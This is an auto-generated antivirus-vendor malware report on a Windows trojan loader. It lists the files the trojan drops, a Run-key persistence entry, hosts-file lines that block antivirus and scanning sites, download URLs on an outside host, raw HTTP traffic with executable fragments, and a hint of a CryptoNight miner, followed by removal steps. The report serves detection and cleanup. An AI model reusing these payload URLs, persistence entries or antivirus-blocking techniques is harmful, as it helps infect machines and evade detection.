Trojan.MSIL.Crypt.dxjp_e532610ae5

by malwarelabrobot on July 2nd, 2017 in Malware Descriptions.

Trojan.MSIL.Crypt.dxjp (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: e532610ae5bb6f39d94e16f88dab2089
SHA1: bee42bfdf158cd06ac9488eef3678719c39ffce9
SHA256: ee3f879a28ea65d530683ba77aa49694f8aa0c50431e55aa827c800fab071b03
SSDeep: 96:H03KVmxGXHzCKpXK3YPQlojQmrQ 3WNts6Gm1Yc1r6KKoU2D5nAe9RoUMLwYa:HfdjCKp6IIVm0 8ZjYcV64U2DJFEUb
Size: 10240 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-26 17:13:28
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:600

The Trojan injects its code into the following process(es):

app.exe:3144
AudioHD.exe:3740

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process app.exe:3144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\AudioHD.exe (104458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\app.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioHD.url (132 bytes)

The Trojan deletes the following file(s):

The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (602 bytes)

Registry activity

The process app.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\app_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AudioHD" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\app.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e532610ae5bb6f39d94e16f88dab2089_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e532610ae5bb6f39d94e16f88dab2089_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\e532610ae5bb6f39d94e16f88dab2089_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e532610ae5bb6f39d94e16f88dab2089_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\e532610ae5bb6f39d94e16f88dab2089_RASMANCS]
"MaxFileSize" = "1048576"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
1ae0e4c44f4ba62ac2bba32c6b164038	c:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\AudioHD.exe
68f95349de95c1a05a85b2d876494b03	c:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\app.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1466 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	validation.sls.microsoft.com
127.0.0.1	virustotal.com
127.0.0.1	jotti.org
127.0.0.1	viruschef.com
127.0.0.1	novirusthanks.org
127.0.0.1	donotdistribute.com
127.0.0.1	nodistribute.com
127.0.0.1	virusscan.jotti.org
127.0.0.1	r.virscan.org
127.0.0.1	www.virustotal.com
127.0.0.1	www.jotti.org
127.0.0.1	www.viruschef.com
127.0.0.1	www.novirusthanks.org
127.0.0.1	www.donotdistribute.com
127.0.0.1	www.nodistribute.com
127.0.0.1	www.virusscan.jotti.org
127.0.0.1	www.r.virscan.org
127.0.0.1	www.metadefender.com
127.0.0.1	metadefender.com

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Loader
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2017
Legal Trademarks:
Original Filename: file.exe
Internal Name: file.exe
File Version: 1.0.0.0
File Description: Loader
Comments:
Language: German (Germany)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	3936	4096	3.20495	921d9e9fc8d536453223e56e723a8a5c
.rsrc	16384	4928	5120	3.72069	36a3ce241ab82933a92b2b36cd20531a
.reloc	24576	12	512	0.056519	1874ad5921b0df3eb833cec33a5b6b74

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://gatsoed9.beget.tech/alex/app.exe	87.236.19.98
hxxp://gatsoed9.beget.tech/AudioHD.exe	87.236.19.98
teredo.ipv6.microsoft.com	157.56.106.189
iplogger.com	88.99.66.31

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /AudioHD.exe HTTP/1.1

Host: gatsoed9.beget.tech

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx-reuseport/1.11.10

Date: Sat, 01 Jul 2017 18:15:17 GMT

Content-Type: application/octet-stream

Content-Length: 1497504

Last-Modified: Sat, 24 Jun 2017 11:00:05 GMT

Connection: keep-alive

Keep-Alive: timeout=30

ETag: "594e4635-16d9a0"

Expires: Mon, 31 Jul 2017 18:15:17 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........<.8.]pk.
]pk.]pk5..k.]pkZ..k.]pkW*.k.]pk.]qkH]pk...k.]pkZ..k,]pkZ..k\]pk...k.]p
k...k.]pk...k.]pkRich.]pk........................PE..L.....]T.........
........&............5......@....@...........................6........
...@.........................\.3.P....@%.......6.|....................
.6.0...Px6.8...................x.5.$....w6.@.............3.D..........
..................text...*$.......................... ..`.rdata..H....
@......................@..@.data...............................@....tl
s................................@....vmp0............................
...`....vmp1...0...........................`....reloc..0.....6........
.............@..@.rsrc...|.....6.....................@..@.............
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /alex/app.exe HTTP/1.1

Host: gatsoed9.beget.tech

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx-reuseport/1.11.10

Date: Sat, 01 Jul 2017 18:15:14 GMT

Content-Type: application/octet-stream

Content-Length: 78848

Last-Modified: Thu, 29 Jun 2017 14:38:58 GMT

Connection: keep-alive

Keep-Alive: timeout=30

ETag: "59551102-13400"

Expires: Mon, 31 Jul 2017 18:15:14 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...1.UY
.................$..........NB... ...`....@.. ........................
............@..................................B..K...................
.................A............................................... ....
........... ..H............text...T"... ...$.................. ..`.sda
ta.......`.......(..............@....rsrc................,............
..@..@.reloc...............2..............@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................0B......H............B....
.......... 9...........................................0.......... .(.
. E...&.-. .....9f...&(....(.....(....(....:}...& ....8@.....o....o...
.. ....8)....o..... ....8.....9....8:... ............E....-...n.......
................<.......O...8....& ....(....:....8.......o....& ...
.8....(.... ....8........... .....:....&*j .(..=Z...&.-.(.....(....*.R
 .(#N.9...&.-.(....*...B .(..,Q...&.-..*...B .(".7G...&.-..*...V .(..S
V...&.-..(....*..b .(>.rm...&.-.....(....*...V .(r.FV...&.-..(.

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

AudioHD.exe_3740:

.text

`.rdata

@.data

.vmp0

.vmp1

.reloc

@.rsrc

X?.Eoe

lKi.mA

(.VI~e

H.mBz]6<

.ILmx

o:\L|

N.vDc

.rP 4&P

D%U4y

%f?]5

11D1

434~4&585

3 3$3(3,30343

7|7r7

7|7R7a7

9 9$9(9,90949~9

<"=1=9=?=

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

1 1$1(1,1014181<1

; ;$;(;,;

8(8,80848

0S091K1h1

0 0$0(0,0

W-.GE;

w.Su7

%c"c5

@?>=<;:9

87654321

0/.-, *)

('&%$#"!

}|Xd.rd

4f.lU

S0.LY

!CTa

h%S)Jy

=f.lz?

6*Á

F.SZT}

.zmH`

.Xm0_

d^%c.

I.DJw

?a.PuC"

,K.Bys

Z.Egh

.ITgt=

%Uv@u

eo.qe

,.UW434

%Dxwq

2:.xCO

Y3.LZ

-.LR$

\Sý

R.wf4

{v.xd

.XF8J

.yKgc

3Âm

BsQl|

-FLt}E

@.zSV

b8A%c

}.qTa

i:\O0N 2lw

jÄEm

t%Un{

qL%Ct

[%uo$

.pjXc%

<:86420.

WS2_32.dll

EnumChildWindows

CRt*u

.Wi|W

%cZy y

?>=<;:98

76543210

/.-, *)(

\.DDp(T

2bP%X

p.uDxi

USER32.dll

ADVAPI32.dll

F%u~M<

KERNEL32.dll

user32.dll

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

conhost.exe_1808:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:600
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\AudioHD.exe (104458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\app.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioHD.url (132 bytes)
C:\Windows\System32\drivers\etc\hosts (602 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AudioHD" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\AudioHDriver\app.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.MSIL.Crypt.dxjp_e532610ae5

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.MSIL.Crypt.dxjp_e532610ae5

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet